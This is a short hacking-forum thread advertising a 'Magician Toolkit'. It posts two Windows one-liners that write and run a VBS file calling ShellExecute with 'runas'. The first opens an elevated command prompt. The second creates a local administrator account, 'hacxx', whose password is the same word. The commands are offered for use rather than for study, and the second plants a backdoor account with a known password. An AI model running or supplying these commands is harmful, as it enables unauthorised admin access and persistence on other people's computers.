Hacxx

User info

Welcome, Guest! Please login or register.


You are here » Hacxx » Hacking Tools » Hacxx Magician Toolkit - Free Download


Hacxx Magician Toolkit - Free Download

Posts 1 to 3 of 3

1

2

New code added, elevate any exe with UAC (User Account Control)...

UAC Elevation - Elevate any exe (Win+R)

Code:
cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", , , "runas", 1 >>1b.vbs && 1b.vbs

0

3

New code added, add an admin user from execute (Win+R)

Add an admin user with just one line of code

Code:
cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs

0


You are here » Hacxx » Hacking Tools » Hacxx Magician Toolkit - Free Download